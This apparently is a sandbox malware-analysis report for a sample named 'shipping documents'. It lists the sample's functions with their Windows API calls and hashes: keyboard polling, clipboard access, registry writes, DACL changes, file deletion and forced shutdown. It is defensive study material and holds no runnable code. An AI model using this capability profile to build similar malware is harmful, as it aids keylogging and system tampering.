Instruction ID: afd0cc2581702cffdfca282c97d9fb2b4191ac98e6adfca84ed04d8d04bada46
Opcode Fuzzy Hash: 6f13521919531b26697fd5cd46208ac050cb25ff41e3644c0d478819b43c3658
Instruction Fuzzy Hash: 4EA13EB1418305ABC750EB64CC85DAFB7EEEF94701F40492EB986C7191EB34DA48CB66

Function 006BF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 006BF221
_wcscmp.LIBCMT ref: 006BF236
_wcscmp.LIBCMT ref: 006BF24D
GetFileAttributesW.KERNEL32(?), ref: 006BF25F
SetFileAttributesW.KERNEL32(?,?), ref: 006BF279
FindNextFileW.KERNEL32(00000000,?), ref: 006BF291
FindClose.KERNEL32(00000000), ref: 006BF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 006BF2B8
_wcscmp.LIBCMT ref: 006BF2DF
_wcscmp.LIBCMT ref: 006BF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 006BF308
SetCurrentDirectoryW.KERNEL32(0070A5A0), ref: 006BF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 006BF330
FindClose.KERNEL32(00000000), ref: 006BF33D
FindClose.KERNEL32(00000000), ref: 006BF34F

Strings

*.*, xrefs: 006BF2B3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 92e04e2b6bcb6dd6dd9ea3f9cb06fcb852f41694d440d21993c2b285803c3b1c
Instruction ID: 26f6bf7489e4284300cc8037b63686a126e5eb8bd6a8252076efaa81a7417322
Opcode Fuzzy Hash: 92e04e2b6bcb6dd6dd9ea3f9cb06fcb852f41694d440d21993c2b285803c3b1c
Instruction Fuzzy Hash: 673104B69012196ADB10DBF4DC59ADE73EEAF08320F144276E805D32A0EB31DF85CB94

Function 006D0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,006DF910,00000000,?,00000000,?,?), ref: 006D0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006D0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006D0D1D
RegCloseKey.ADVAPI32(?), ref: 006D103D
RegCloseKey.ADVAPI32(00000000), ref: 006D104A

Strings

REG_SZ, xrefs: 006D0D5B
REG_QWORD, xrefs: 006D0F8B
REG_BINARY, xrefs: 006D0FD8
REG_MULTI_SZ, xrefs: 006D0E05
REG_EXPAND_SZ, xrefs: 006D0CBA
REG_DWORD, xrefs: 006D0F0E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: cd94eb471a7d211c81946b4479168f60bef5b951650b2ec08423bf4b1f80834e
Instruction ID: d5fc94a7c98e752a9e079bf06f2786b5dee8491971e61f33398b71e6c7fe7af4
Opcode Fuzzy Hash: cd94eb471a7d211c81946b4479168f60bef5b951650b2ec08423bf4b1f80834e
Instruction Fuzzy Hash: D10249756006119FCB54EF24C891E2AB7E6FF89714F08885DF88A9B362CB30ED45CB95

Function 006BF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 006BF37E
_wcscmp.LIBCMT ref: 006BF393
_wcscmp.LIBCMT ref: 006BF3AA

Part of subcall function 006B45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006B45DC

FindNextFileW.KERNEL32(00000000,?), ref: 006BF3D9
FindClose.KERNEL32(00000000), ref: 006BF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 006BF400
_wcscmp.LIBCMT ref: 006BF427
_wcscmp.LIBCMT ref: 006BF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 006BF450
SetCurrentDirectoryW.KERNEL32(0070A5A0), ref: 006BF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 006BF478
FindClose.KERNEL32(00000000), ref: 006BF485
FindClose.KERNEL32(00000000), ref: 006BF497

Strings

*.*, xrefs: 006BF3FB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: fc394cadaeea2e643385839068b2520764819dc3907d9238ab9002feee4a4353
Instruction ID: 591f46cd1910632e6870844b98df67154a17a46df3ea8a9ebb47a9eaddfe3dec
Opcode Fuzzy Hash: fc394cadaeea2e643385839068b2520764819dc3907d9238ab9002feee4a4353
Instruction Fuzzy Hash: FD31F8B15012196FCB109BA4EC88ADE77EE9F09320F144276E844E32F1DB74DE84CBA4

Function 006A81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006A8766
Part of subcall function 006A874A: GetLastError.KERNEL32(?,006A822A,?,?,?), ref: 006A8770
Part of subcall function 006A874A: GetProcessHeap.KERNEL32(00000008,?,?,006A822A,?,?,?), ref: 006A877F
Part of subcall function 006A874A: HeapAlloc.KERNEL32(00000000,?,006A822A,?,?,?), ref: 006A8786
Part of subcall function 006A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006A879D

Part of subcall function 006A87E7: GetProcessHeap.KERNEL32(00000008,006A8240,00000000,00000000,?,006A8240,?), ref: 006A87F3
Part of subcall function 006A87E7: HeapAlloc.KERNEL32(00000000,?,006A8240,?), ref: 006A87FA
Part of subcall function 006A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006A8240,?), ref: 006A880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006A825B
_memset.LIBCMT ref: 006A8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006A828F
GetLengthSid.ADVAPI32(?), ref: 006A82A0
GetAce.ADVAPI32(?,00000000,?), ref: 006A82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006A82F9
GetLengthSid.ADVAPI32(?), ref: 006A8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006A8325
HeapAlloc.KERNEL32(00000000), ref: 006A832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 006A834D
CopySid.ADVAPI32(00000000), ref: 006A8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006A8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006A83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006A83BF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c9d545ab376c6441de67295b10255f350c5bf58704d1a6ba7f85fb494426de50
Instruction ID: fdb2eeb81a96d0821cd97704f7f984dfd5355e8feb0608d648d1d3c16bba8389
Opcode Fuzzy Hash: c9d545ab376c6441de67295b10255f350c5bf58704d1a6ba7f85fb494426de50
Instruction Fuzzy Hash: FC613A71900219AFDF00AFA5DC44AEEBBBAFF05700F14816AF816A7291DB319E05CF60

Function 00666843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

BSR_UNICODE), xrefs: 006A1771
Oaf, xrefs: 006A1888, 006A192F, 006A19DD
CR), xrefs: 006A16C0
CRLF), xrefs: 006A16FA
ANYCRLF), xrefs: 006A1734
PJo, xrefs: 006668B3
ANY), xrefs: 006A1717
LF), xrefs: 006A16DD
UTF16), xrefs: 006A1508
UCP), xrefs: 006A1546
BSR_ANYCRLF), xrefs: 006A1757
LIMIT_RECURSION=, xrefs: 006A1635
NO_START_OPT), xrefs: 006A1588
UTF), xrefs: 006A1533
LIMIT_MATCH=, xrefs: 006A15A9
NO_AUTO_POSSESS), xrefs: 006A1567

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oaf$PJo$UCP)$UTF)$UTF16)
API String ID: 0-1612524099
Opcode ID: 58f6a21ad785a08f0fed2478ab9986839c63778f7a71e47f011b9e4c69628c07
Instruction ID: 4f026a1ed7a89accdccaa0a55d392d8a380fc1cc74e8c2eea80ea41f681f2f4e
Opcode Fuzzy Hash: 58f6a21ad785a08f0fed2478ab9986839c63778f7a71e47f011b9e4c69628c07
Instruction Fuzzy Hash: FF725D75E002199BDB14DF58D8907EEB7B6EF49310F14816AE949EB380EB749E81CF90

Function 006D0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006D0038,?,?), ref: 006D10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D0737

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006D07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006D086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006D0AAD
RegCloseKey.ADVAPI32(00000000), ref: 006D0ABA

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 875c6680b8684d92bdd58571dc578172a54e235c2b923e8be4914f0c29ce6eaf
Instruction ID: 0704258843eea4dcac85baa8325ba2fa3e22bfe83bfb25492cfbe244e49bb0e0
Opcode Fuzzy Hash: 875c6680b8684d92bdd58571dc578172a54e235c2b923e8be4914f0c29ce6eaf
Instruction Fuzzy Hash: 71E15F31604300AFDB14DF25C895E6ABBE6EF89714F08856EF84ADB362DA30ED05CB51

Function 006B0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006B0241
GetAsyncKeyState.USER32(000000A0), ref: 006B02C2
GetKeyState.USER32(000000A0), ref: 006B02DD
GetAsyncKeyState.USER32(000000A1), ref: 006B02F7
GetKeyState.USER32(000000A1), ref: 006B030C
GetAsyncKeyState.USER32(00000011), ref: 006B0324
GetKeyState.USER32(00000011), ref: 006B0336
GetAsyncKeyState.USER32(00000012), ref: 006B034E
GetKeyState.USER32(00000012), ref: 006B0360
GetAsyncKeyState.USER32(0000005B), ref: 006B0378
GetKeyState.USER32(0000005B), ref: 006B038A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b45ba52c8559e618da68c6c719bd7854756fd1bb66681a4ac11d91aa2cec7d1f
Instruction ID: f4639f180b6847cb0e1475a4f41e9c91845379d89c0fde47fe41a0f580140129
Opcode Fuzzy Hash: b45ba52c8559e618da68c6c719bd7854756fd1bb66681a4ac11d91aa2cec7d1f
Instruction Fuzzy Hash: DC41ABB49047CA6EFF715B64940C3EBBEE26F11340F18419ED5C6463C2DBA45AC88792

Function 006C4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 006C447F
EmptyClipboard.USER32 ref: 006C4485
GlobalAlloc.KERNEL32(00000002,?), ref: 006C449A
CloseClipboard.USER32 ref: 006C4539

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d37d4b588731a476a03685584f7af7be53a7f6723d2ceaf7ed581c29feb3909d
Instruction ID: ea8af9368054f62717b6464c52b2b869a265a3c9fbf182ef8b012486a9a8813c
Opcode Fuzzy Hash: d37d4b588731a476a03685584f7af7be53a7f6723d2ceaf7ed581c29feb3909d
Instruction Fuzzy Hash: 54218B356012109FDB10AF64EC19F6A7BAAEF44721F14C02AF947DB2A1CB34ED01CB58

Function 006B3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006548A1,?,?,006537C0,?), ref: 006548CE

Part of subcall function 006B4CD3: GetFileAttributesW.KERNEL32(?,006B3947), ref: 006B4CD4

FindFirstFileW.KERNEL32(?,?), ref: 006B3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006B3B87
MoveFileW.KERNEL32(?,?), ref: 006B3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006B3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 006B3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 006B3BF5

Strings

\*.*, xrefs: 006B3A8A, 006B3A93, 006B3AA8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 2c88ac84eb43979b79856e3816c2837d70dec0f577e11eb318d7c20d90f44e37
Instruction ID: 89cf10c30e7ba0203bcb84c1f355946b7dfba09e26e5e24203f51802938ab55b
Opcode Fuzzy Hash: 2c88ac84eb43979b79856e3816c2837d70dec0f577e11eb318d7c20d90f44e37
Instruction Fuzzy Hash: DC51B371D0121C9ACF45EBA0DD928EDB77AAF14301F2441A9E80277292DF306F4DCB94

Function 00664140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0066421F
VUUU, xrefs: 00697B0C
Oaf, xrefs: 00664984, 00698173
VUUU, xrefs: 006644ED
VUUU, xrefs: 006644DB
VUUU, xrefs: 00664520

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID: ERCP$Oaf$VUUU$VUUU$VUUU$VUUU
API String ID: 0-2934378390
Opcode ID: 44271da2577b85faa07b7a76f3e1d7568694d9b24b9e4909bffe2ba43cb172fb
Instruction ID: 5002b519ad7ab7863c0ab13c4de6bdbab1d91c6aacdc8b92b424d6c8740ecf37
Opcode Fuzzy Hash: 44271da2577b85faa07b7a76f3e1d7568694d9b24b9e4909bffe2ba43cb172fb
Instruction Fuzzy Hash: 82A26D70E0421ACBDF24CF58C9907EDB7B6BF55314F2481AAD856A7780EB349E85CB90

Function 006BF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006BF6AB
Sleep.KERNEL32(0000000A), ref: 006BF6DB
_wcscmp.LIBCMT ref: 006BF6EF
_wcscmp.LIBCMT ref: 006BF70A
FindNextFileW.KERNEL32(?,?), ref: 006BF7A8
FindClose.KERNEL32(00000000), ref: 006BF7BE

Strings

*.*, xrefs: 006BF690

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 6bff5791c65af7fcc3793ffd5f24ffb4aa37604c3cb9129911b9cc02bb623189
Instruction ID: 16643223383fd675e1ced1e97a3b15dff9567def6af2646386c140000c924454
Opcode Fuzzy Hash: 6bff5791c65af7fcc3793ffd5f24ffb4aa37604c3cb9129911b9cc02bb623189
Instruction Fuzzy Hash: 5D41B8B190021AAFCF50DF64DC45AEEBBB6FF05310F1445BAE815A32A1EB309E84CB50

Function 006658C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00665A05
_memmove.LIBCMT ref: 00665A55
_memmove.LIBCMT ref: 00665ABB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0f7b6dee2cb28d5ac4b7a9665d0954890a111fa61a7953b9426d5f85d5b6fdb2
Instruction ID: 3e0f6d21bd09ed4b719fd2040bf5a578757f634174398876e0bc561e41272547
Opcode Fuzzy Hash: 0f7b6dee2cb28d5ac4b7a9665d0954890a111fa61a7953b9426d5f85d5b6fdb2
Instruction Fuzzy Hash: 17126970A00609DFDF14DFA4D992AEEB7B6FF48300F108669E806E7251EB35AD15CB64

Function 00665680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00670FF6: std::exception::exception.LIBCMT ref: 0067102C
Part of subcall function 00670FF6: __CxxThrowException@8.LIBCMT ref: 00671041

_memmove.LIBCMT ref: 006A062F
_memmove.LIBCMT ref: 006A0744
_memmove.LIBCMT ref: 006A07EB

Strings

yZf, xrefs: 006A0881, 006A07FF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZf
API String ID: 1300846289-1088748414
Opcode ID: 2e78a18822a834823166f9be918fcd6e48f48daa91d7dcd0a8922c5306749cdf
Instruction ID: 3b43d6bc567d03a47f90946e3411afeeae57b8ad61e8fc82758c0b84993106f5
Opcode Fuzzy Hash: 2e78a18822a834823166f9be918fcd6e48f48daa91d7dcd0a8922c5306749cdf
Instruction Fuzzy Hash: 5E02AEB0A00205DBDF04DF64D982AAEBBB6EF45300F14806DE80ADB255EB35EE55CF95

Function 006B545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A8D0D
Part of subcall function 006A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8D3A
Part of subcall function 006A8CC3: GetLastError.KERNEL32 ref: 006A8D47

ExitWindowsEx.USER32(?,00000000), ref: 006B549B

Strings

SeShutdownPrivilege, xrefs: 006B546B
@, xrefs: 006B548E
, xrefs: 006B5489

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 935b54c962b41b210da82e1000f0e616bd87ac4bc3eb2baa03320deac0cfa09b
Instruction ID: 6f1ab5d45998a5ead6659af57abe2492944b705d868d9a22d5c038f91170da71
Opcode Fuzzy Hash: 935b54c962b41b210da82e1000f0e616bd87ac4bc3eb2baa03320deac0cfa09b
Instruction Fuzzy Hash: 02012FF1A95B116AE7686378AC4ABFA72DAAB01352F240535FD07D22D2DA901CC187A4

Function 00663190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oaf, xrefs: 00663482

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

